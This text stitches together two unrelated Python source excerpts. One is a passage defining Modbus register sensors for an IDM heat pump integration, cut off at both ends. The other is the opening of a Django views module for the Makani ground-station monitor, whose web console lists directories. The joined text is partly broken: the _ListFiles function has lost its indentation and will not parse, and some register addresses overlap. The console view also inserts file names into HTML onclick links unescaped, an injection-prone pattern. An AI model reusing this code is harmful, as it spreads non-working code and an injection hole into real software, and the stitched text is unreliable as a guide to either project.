        """Number of registers this sensor's value occupies"""

    @abstractmethod
    def decode(self, decoder: BinaryPayloadDecoder):
        """Decode this sensor's value"""

    # FIX: previously declared without @abstractmethod, so a subclass that
    # forgot to override it would silently return None; every concrete
    # subclass in this file implements it, so marking it abstract is safe.
    @abstractmethod
    def entity_description(self, config_entry) -> SensorEntityDescription:
        """SensorEntityDescription for this sensor"""
@dataclass
class IdmBinarySensorAddress:
    """Describes one of the binary sensors of an IDM heatpump."""

    address: int
    name: str
    device_class: BinarySensorDeviceClass

    @property
    def size(self) -> int:
        """Number of registers this sensor's value occupies."""
        # A binary value fits in a single 16-bit register.
        return 1

    def decode(self, decoder: BinaryPayloadDecoder) -> bool:
        """Decode this sensor's value: register content 1 means on."""
        return decoder.decode_16bit_uint() == 1

    def entity_description(self, config_entry) -> BinarySensorEntityDescription:
        """BinarySensorEntityDescription for this sensor."""
        display_name = config_entry.data.get(CONF_DISPLAY_NAME)
        sensor_label = SENSOR_NAMES.get(self.address)
        return BinarySensorEntityDescription(
            key=self.name,
            name=f"{display_name}: {sensor_label}",
            device_class=self.device_class,
        )
@dataclass
class _FloatSensorAddress(IdmSensorAddress):
    """Sensor whose value is a 32-bit float spanning two registers."""

    unit: str
    decimal_digits: int = 2
    scale: float = 1
    # Values outside [min_value, max_value] are reported as None.
    # NOTE(review): 0xFFFE as the default upper bound presumably marks the
    # device's "no value" sentinel -- confirm against the IDM modbus docs.
    min_value: Union[float, None] = None
    max_value: Union[float, None] = 0xFFFE

    @property
    def size(self):
        # One 32-bit float occupies two 16-bit registers.
        return 2

    def decode(self, decoder: BinaryPayloadDecoder) -> float:
        """Decode, scale, and round the value; None when out of range."""
        value = round(decoder.decode_32bit_float() * self.scale, self.decimal_digits)
        return (
            None
            if (self.min_value is not None and value < self.min_value)
            or (self.max_value is not None and value > self.max_value)
            else value
        )

    def entity_description(self, config_entry):
        """SensorEntityDescription for this sensor."""
        return SensorEntityDescription(
            key=self.name,
            name=f"{config_entry.data.get(CONF_DISPLAY_NAME)}: {SENSOR_NAMES.get(self.address)}",
            device_class=self.device_class,
            state_class=self.state_class,
            native_unit_of_measurement=self.unit,
        )
@dataclass
class _UCharSensorAddress(IdmSensorAddress):
    """Sensor whose value is an unsigned 16-bit integer in one register."""

    unit: str
    # Values outside [min_value, max_value] are reported as None; the default
    # upper bound 0xFFFE excludes the 0xFFFF "no value" register content.
    min_value: Union[int, None] = None
    max_value: Union[int, None] = 0xFFFE

    @property
    def size(self):
        return 1

    def decode(self, decoder: BinaryPayloadDecoder) -> int:
        """Decode the value; None when out of range."""
        value = decoder.decode_16bit_uint()
        return (
            None
            if (self.min_value is not None and value < self.min_value)
            or (self.max_value is not None and value > self.max_value)
            else value
        )

    def entity_description(self, config_entry):
        """SensorEntityDescription for this sensor."""
        return SensorEntityDescription(
            key=self.name,
            name=f"{config_entry.data.get(CONF_DISPLAY_NAME)}: {SENSOR_NAMES.get(self.address)}",
            device_class=self.device_class,
            state_class=self.state_class,
            native_unit_of_measurement=self.unit,
        )
@dataclass
class _WordSensorAddress(IdmSensorAddress):
    """Single-register sensor without the 0xFFFE default upper bound."""

    unit: str
    min_value: Union[int, None] = None
    max_value: Union[int, None] = None

    @property
    def size(self):
        return 1

    def decode(self, decoder: BinaryPayloadDecoder) -> int:
        """Decode the raw register; None when outside the allowed range."""
        raw = decoder.decode_16bit_uint()
        if self.min_value is not None and raw < self.min_value:
            return None
        if self.max_value is not None and raw > self.max_value:
            return None
        return raw

    def entity_description(self, config_entry):
        """SensorEntityDescription for this sensor"""
        label = f"{config_entry.data.get(CONF_DISPLAY_NAME)}: {SENSOR_NAMES.get(self.address)}"
        return SensorEntityDescription(
            key=self.name,
            name=label,
            device_class=self.device_class,
            state_class=self.state_class,
            native_unit_of_measurement=self.unit,
        )
@dataclass
class _EnumSensorAddress(IdmSensorAddress):
    """Single-register sensor whose raw value maps to a text label."""

    value_labels: Dict[int, str]

    @property
    def size(self):
        return 1

    def decode(self, decoder: BinaryPayloadDecoder) -> str:
        """Map the raw register to its label; 0xFFFF means 'no value'."""
        raw = decoder.decode_16bit_uint()
        return None if raw == 0xFFFF else self.value_labels.get(raw)

    def entity_description(self, config_entry):
        """SensorEntityDescription for this sensor"""
        display = config_entry.data.get(CONF_DISPLAY_NAME)
        return SensorEntityDescription(
            key=self.name,
            name=f"{display}: {SENSOR_NAMES.get(self.address)}",
            device_class=self.device_class,
            state_class=self.state_class,
        )
@dataclass
class _BitFieldSensorAddress(IdmSensorAddress):
    """Single-register sensor whose bits each carry a separate label."""

    bit_labels: Dict[int, str]

    @property
    def size(self):
        return 1

    def decode(self, decoder: BinaryPayloadDecoder) -> str:
        """Render the set bits as a comma-separated label string."""
        raw = decoder.decode_16bit_uint()
        if raw == 0xFFFF:
            # All-ones reads as "no value".
            return None
        if raw == 0:
            # Bit key 0 holds the label for "nothing set".
            return self.bit_labels.get(0)
        active = (label for bit, label in self.bit_labels.items() if raw & bit)
        return ", ".join(active)

    def entity_description(self, config_entry):
        """SensorEntityDescription for this sensor"""
        display = config_entry.data.get(CONF_DISPLAY_NAME)
        return SensorEntityDescription(
            key=self.name,
            name=f"{display}: {SENSOR_NAMES.get(self.address)}",
            device_class=self.device_class,
            state_class=self.state_class,
        )
def heat_circuit_sensors(circuit) -> List[IdmSensorAddress]:
    """data for heat circuit sensors

    Args:
        circuit: single-letter circuit identifier ("a", "b", ...); the
            letter determines the register offset of every sensor below.
    """
    # Circuit "a" uses the base addresses; each subsequent circuit shifts
    # by one register for single-register values and by two registers for
    # two-register float values.
    offset = ord(circuit) - ord("a")
    return [
        _FloatSensorAddress(
            address=1350 + offset * 2,
            name=f"temp_flow_current_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=0,
            max_value=100,
        ),
        _FloatSensorAddress(
            address=1364 + offset * 2,
            name=f"temp_room_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=0,
            max_value=100,
        ),
        _FloatSensorAddress(
            address=1378 + offset * 2,
            name=f"temp_flow_target_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=0,
            max_value=100,
        ),
        _EnumSensorAddress(
            address=1393 + offset,
            name=f"mode_circuit_{circuit}",
            value_labels={
                0: "off",
                1: "timed",
                2: "normal",
                3: "eco",
                4: "manual_heat",
                5: "manual_cool",
            },
            device_class=None,
            state_class=None,
        ),
        _FloatSensorAddress(
            address=1401 + offset * 2,
            name=f"temp_room_target_heating_normal_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=15,
            max_value=30,
        ),
        _FloatSensorAddress(
            address=1415 + offset * 2,
            name=f"temp_room_target_heating_eco_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=10,
            max_value=25,
        ),
        # Heating-curve slope: unitless factor, hence no device/state class.
        _FloatSensorAddress(
            address=1429 + offset * 2,
            name=f"curve_circuit_{circuit}",
            unit=None,
            device_class=None,
            state_class=None,
            min_value=0.1,
            max_value=3.5,
        ),
        _UCharSensorAddress(
            address=1442 + offset * 2,
            name=f"temp_threshold_heating_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=0,
            max_value=50,
        ),
        _UCharSensorAddress(
            address=1449 + offset * 2,
            name=f"temp_flow_target_constant_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=20,
            max_value=90,
        ),
        _FloatSensorAddress(
            address=1457 + offset * 2,
            name=f"temp_room_target_cooling_normal_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=15,
            max_value=30,
        ),
        _FloatSensorAddress(
            address=1471 + offset * 2,
            name=f"temp_room_target_cooling_eco_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=15,
            max_value=30,
        ),
        _UCharSensorAddress(
            address=1484 + offset,
            name=f"temp_threshold_cooling_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=0,
            max_value=36,
        ),
        _UCharSensorAddress(
            address=1491 + offset,
            name=f"temp_flow_target_cooling_circuit_{circuit}",
            unit=TEMP_CELSIUS,
            device_class=SensorDeviceClass.TEMPERATURE,
            state_class=SensorStateClass.MEASUREMENT,
            min_value=8,
            max_value=30,
        ),
        _EnumSensorAddress(
            address=1498 + offset,
            name=f"mode_active_circuit_{circuit}",
            value_labels={
                0: "off",
                1: "heating",
                2: "cooling",
            },
            device_class=None,
            state_class=None,
        ),
        # NOTE(review): name lacks the "circuit_" infix used by the other
        # entries; kept as-is because renaming would change the entity key.
        _UCharSensorAddress(
            address=1505 + offset,
            name=f"curve_offset_{circuit}",
            unit=PERCENTAGE,
            device_class=None,
            state_class=None,
            min_value=0,
            max_value=30,
        ),
    ]
SENSOR_ADDRESSES: Dict[str, IdmSensorAddress] = {
s.name: s
for s in [
_FloatSensorAddress(
address=1000,
name="temp_outside",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1002,
name="temp_outside_avg",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_UCharSensorAddress(
address=1004,
name="failure_id",
unit="",
device_class=None,
state_class=None,
),
_EnumSensorAddress(
address=1005,
name="status_system",
value_labels={
0: "standby",
1: "automatic",
2: "away",
4: "hot_water_only",
5: "heating_cooling_only",
},
device_class=None,
state_class=None,
),
_EnumSensorAddress(
address=1006,
name="status_smart_grid",
value_labels={
0: "grid_blocked_solar_off",
1: "grid_allowed_solar_off",
2: "grid_unused_solar_on",
4: "grid_blocked_solar_on",
},
device_class=None,
state_class=None,
),
_FloatSensorAddress(
address=1008,
name="temp_heat_storage",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1010,
name="temp_cold_storage",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1012,
name="temp_water_heater_top",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1014,
name="temp_water_heater_bottom",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1030,
name="temp_water_heater_tap",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_UCharSensorAddress(
address=1032,
name="temp_water_target",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=35,
max_value=95,
),
_UCharSensorAddress(
address=1033,
name="temp_water_switch_on",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=30,
max_value=50,
),
_UCharSensorAddress(
address=1034,
name="temp_water_switch_off",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=46,
max_value=53,
),
_FloatSensorAddress(
address=1048,
name="price_energy",
unit=CURRENCY_EURO,
scale=0.001,
device_class=SensorDeviceClass.MONETARY,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1050,
name="temp_heat_pump_flow",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1052,
name="temp_heat_pump_return",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1054,
name="temp_hgl_flow",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1056,
name="temp_heat_source_input",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1058,
name="temp_heat_source_output",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1060,
name="temp_air_input",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1062,
name="temp_air_heat_exchanger",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1064,
name="temp_air_input_2",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_BitFieldSensorAddress(
address=1090,
name="status_heat_pump",
bit_labels={
0: "off",
1: "heating",
2: "cooling",
4: "water",
8: "defrosting",
},
device_class=None,
state_class=None,
),
_WordSensorAddress(
address=1104,
name="load_charge_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1105,
name="load_brine_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1106,
name="load_ground_water_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1108,
name="load_isc_cold_storage_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1109,
name="load_isc_recooling_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1110,
name="valve_state_circuit_heating_cooling",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1111,
name="valve_state_storage_heating_cooling",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1112,
name="valve_state_main_heating_water",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1113,
name="valve_state_source_heating_cooling",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1114,
name="valve_state_solar_heating_water",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1115,
name="valve_state_solar_storage_source",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1116,
name="valve_state_isc_heating_cooling",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1120,
name="temp_second_source_bivalence_1",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=-30,
max_value=40,
),
_WordSensorAddress(
address=1121,
name="temp_second_source_bivalence_2",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=-30,
max_value=40,
),
_WordSensorAddress(
address=1122,
name="temp_third_source_bivalence_1",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=-30,
max_value=40,
),
_WordSensorAddress(
address=1123,
name="temp_third_source_bivalence_2",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=-30,
max_value=40,
),
_UCharSensorAddress(
address=1150,
name="count_running_compressor_stages_heating",
unit=None,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
),
_UCharSensorAddress(
address=1151,
name="count_running_compressor_stages_cooling",
unit=None,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
),
_UCharSensorAddress(
address=1152,
name="count_running_compressor_stages_water",
unit=None,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
),
*heat_circuit_sensors("a"),
*heat_circuit_sensors("b"),
*heat_circuit_sensors("c"),
*heat_circuit_sensors("d"),
# *heat_circuit_sensors("e"),
# *heat_circuit_sensors("f"),
# *heat_circuit_sensors("g"),
_FloatSensorAddress(
address=1392,
name="humidity",
unit=PERCENTAGE,
device_class=SensorDeviceClass.HUMIDITY,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_UCharSensorAddress(
address=1694,
name="temp_external_request_heating",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=20,
max_value=65,
),
_UCharSensorAddress(
address=1695,
name="temp_external_request_cooling",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=10,
max_value=25,
),
_FloatSensorAddress(
address=1750,
name="energy_heat_total",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1752,
name="energy_heat_total_cooling",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1754,
name="energy_heat_total_water",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1756,
name="energy_heat_total_defrost",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1758,
name="energy_heat_total_passive_cooling",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1760,
name="energy_heat_total_solar",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1762,
name="energy_heat_total_electric",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1790,
name="power_current",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1792,
name="power_current_solar",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
),
_FloatSensorAddress(
address=1850,
name="temp_solar_collector",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1852,
name="temp_solar_collector_return",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1854,
name="temp_solar_charge",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_EnumSensorAddress(
address=1856,
name="mode_solar",
value_labels={
0: "auto",
1: "water",
2: "heating",
3: "water_heating",
4: "source_pool",
},
device_class=None,
state_class=None,
),
_FloatSensorAddress(
address=1857,
name="temp_solar_reference",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1870,
name="temp_isc_charge_cooling",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1872,
name="temp_isc_recooling",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_BitFieldSensorAddress(
address=1874,
name="mode_isc",
bit_labels={
0: "none",
1: "heating",
4: "water",
8: "source",
},
device_class=None,
state_class=None,
),
_FloatSensorAddress(
address=74,
name="power_solar_surplus",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
),
_FloatSensorAddress(
address=78,
name="power_solar_production",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
),
_FloatSensorAddress(
address=4122,
name="power_current_draw",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
),
]
}
BINARY_SENSOR_ADDRESSES: Dict[str, IdmBinarySensorAddress] = {
sensor.name: sensor
for sensor in [
IdmBinarySensorAddress(
address=1099,
name="failure_heat_pump",
device_class=BinarySensorDeviceClass.PROBLEM,
),
IdmBinarySensorAddress(
address=1100,
name="failure_compressor_1",
device_class=BinarySensorDeviceClass.PROBLEM,
),
IdmBinarySensorAddress(
address=1101,
name="failure_compressor_2",
device_class=BinarySensorDeviceClass.PROBLEM,
),
IdmBinarySensorAddress(
address=1102,
name="failure_compressor_3",
device_class=BinarySensorDeviceClass.PROBLEM,
),
IdmBinarySensorAddress(
address=1103,
name="failure_compressor_4",
device_class=BinarySensorDeviceClass.PROBLEM,
| |
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""View functions to interact with web clients."""
import atexit
import json
import logging
import os
import re
import string
import time
from django import http
from django import shortcuts
from django import template
from django.core import urlresolvers
from makani.analysis.checks import log_util
from makani.avionics.network import message_type as aio_message_type
from makani.avionics.network import network_config
from makani.gs.monitor2.apps.layout import autogen
from makani.gs.monitor2.apps.layout import base as layout_base
from makani.gs.monitor2.apps.layout import layout_util
from makani.gs.monitor2.apps.layout import loader
from makani.gs.monitor2.apps.layout import memory as layout_memory
from makani.gs.monitor2.apps.layout import stoplights
from makani.gs.monitor2.apps.layout import widgets
from makani.gs.monitor2.apps.receiver import receiver_manager
from makani.gs.monitor2.apps.receiver import views as receiver_views
from makani.gs.monitor2.project import settings
from makani.lib.bazel import bazel_util
from makani.lib.python import c_helpers
from makani.lib.python import debug_util
from makani.lib.python import struct_tree
from makani.lib.python.h5_utils import h5_io
import numpy
# Helper wrapping the MessageType enum (see c_helpers.EnumHelper) for
# name/value lookups throughout this module.
MESSAGE_TYPE_HELPER = c_helpers.EnumHelper('MessageType', aio_message_type)
# Locations of JSON configuration files loaded when building layouts.
CONFIG_FILES = {
    'plot_defs': os.path.join(settings.MONITOR_PATH, 'configs/plot_defs.json'),
}
def Home(request):
  """Render the home page listing all available monitor layouts."""
  all_layouts = []
  for layout in sorted(loader.LayoutLoader().Names()):
    all_layouts.append(
        {'name': layout,
         'url': urlresolvers.reverse(
             'view_aio_layout',
             args=[loader.LayoutLoader().ModuleName(layout)])})
  context = {
      'layouts': all_layouts,
      'canvas_cols': settings.CSS_GRID_COLUMNS,
  }
  _CreateAndAddClientIdToContext(context)
  return shortcuts.render(request, 'home.html', context,
                          context_instance=template.RequestContext(request))
def _ListFiles(path_arg):
"""List files under a local path."""
path_template = string.Template(path_arg)
prefix_path = path_template.substitute(os.environ)
sub_paths = os.listdir(prefix_path)
return prefix_path, sub_paths
def _GetFullFilePath(prefix_path, sub_path):
  """Join a directory prefix and a sub-path into one full path."""
  return os.path.join(prefix_path, sub_path)
def SelectAllLogs(request):
  """Select all logs in the last visited directory."""
  current_path = request.session['current_path']
  try:
    prefix_path, sub_paths = _ListFiles(current_path)
  except OSError:
    return http.HttpResponse('Cannot list directory "%s"!' % current_path)
  selected = []
  for name in sorted(sub_paths):
    # Only plain HDF5 files count; skip "format*" files and directories.
    if not name.endswith('.h5') or name.startswith('format'):
      continue
    full_path = _GetFullFilePath(prefix_path, name)
    if os.path.isdir(full_path):
      continue
    selected.append(full_path)
  return http.HttpResponse(';\n'.join(selected))
def Console(request, command, args):
  """Take commandlines from the client and respond with console outputs.

  Args:
    request: The HTML resquest object.
    command: The command to be run. Only 'ls' is permitted for now.
    args: The string of arguments to the command.

  Returns:
    The HttpResponse telling the output of the command.
  """
  # Whitelist: 'ls' is the only command the web console may run.
  if command != 'ls':
    return http.HttpResponse('Command "%s" is not allowed.' % command)
  arg_path = string.Template(args).safe_substitute(
      {'MAKANI_HOME': bazel_util.GetWorkspaceRoot()})
  try:
    prefix_path, sub_paths = _ListFiles(arg_path)
  except OSError:
    return http.HttpResponse('Cannot list directory "%s"!' % arg_path)
  # Remember the directory so SelectAllLogs can reuse it.
  request.session['current_path'] = arg_path
  entries = []
  for name in sorted(sub_paths):
    full_path = _GetFullFilePath(prefix_path, name)
    if os.path.isdir(full_path):
      # Directories become links that list their contents.
      entries.append(
          '<a href="javascript:void(0)" onclick="onListFiles(\'%s\')">%s</a>'
          % (full_path, name))
    elif name.endswith('.h5') and not name.startswith('format'):
      # HDF5 files become links that add the log for visualization.
      entries.append(
          '<a href="javascript:void(0)" onclick="onAddLog(\'%s\')">%s</a>'
          % (full_path, name))
    else:
      entries.append(name)
  return http.HttpResponse('<br>'.join(entries))
def _GetMinMessageFrequency():
  """Get the minimum frequency across all message types."""
  # Aperiodic messages (frequency_hz == 0) are excluded so the result is
  # strictly positive and safe to use as a divisor.
  config = network_config.NetworkConfig(settings.NETWORK_YAML)
  return min(m.frequency_hz for m in config.all_messages if m.frequency_hz > 0)
def _TryToEnforceAioReceiver(client_id):
  """Ensure that the client is subscribed to the AioReceiver."""
  # TODO: Investigate always running the AioReceiver.
  receiver = receiver_manager.ReceiverManager.GetReceiver(client_id)
  if receiver:
    return receiver
  started = receiver_manager.ReceiverManager.CheckAndStartAioReceiver(
      client_id, receiver_views.CreateAioReceiver)
  if started:
    # A new AioReceiver is started. Wait two periods of the slowest
    # message so we do not miss any message type.
    time.sleep(2.0 / _GetMinMessageFrequency())
  return receiver_manager.ReceiverManager.GetReceiver(client_id)
def ViewMessageType(request, client_id, message_type,
                    template_name='monitor.html'):
  """View information within a message by automatically generating a layout.

  Args:
    request: An HttpRequest from the client.
    client_id: The ID of the client's browser tab.
    message_type: The Enum name of a message type.
    template_name: The HTML template used to render the layout.

  Returns:
    An HttpResponse in the format of a serialized JSON object.
  """
  configs = _LoadConfigs()
  _TryToEnforceAioReceiver(client_id)
  message = _GetMessage(request, client_id, message_type)
  message_dict = message.Data(convert_to_basic_types=True) if message else {}
  configs['scenarios'] = autogen.GenerateScenario(message_dict, message_type)
  context = _PrepareContext(configs)
  new_client_id = _CreateAndAddClientIdToContext(context)
  context.update({
      'periodic_url': '/dashboard/periodic/msg_enum/%s/%s' % (
          new_client_id, message_type),
      'content_width': settings.CSS_GRID_COLUMNS,
      'order_horizontally': True,
  })
  return shortcuts.render(request, template_name, context,
                          context_instance=template.RequestContext(request))
def UpdateMessageOptions(unused_request, client_id):
  """Detect what messages have been received and update the client.

  Args:
    unused_request: An HttpRequest from the client.
    client_id: The ID of the client's browser tab.

  Returns:
    An HttpResponse about a dictionary of {message_enum: message_short_name}
  """
  receiver = _TryToEnforceAioReceiver(client_id)
  if receiver:
    info = receiver.GetReceivedMessageTypes()
  else:
    info = []
  return http.HttpResponse(json.dumps(info))
def ViewAioLayout(request, layout_name):
  """Open a monitor layout that get data from AIO.

  Args:
    request: An HttpRequest from the client.
    layout_name: Name of the layout associated with the client.

  Returns:
    An HttpResponse in the format of a serialized JSON object.
  """
  return _ViewLayout(request, layout_name, {'receiver_type': 'aio'})
def BrowseLog(request, path):
  """Browse the log by expanding the field at `path`.

  Args:
    request: An HttpRequest from the client.
    path: A path pointing to one field in the log.

  Returns:
    An HttpResponse serializing a list of names for child fields.
  """
  # The log structure may differ across logs; we always use the first log
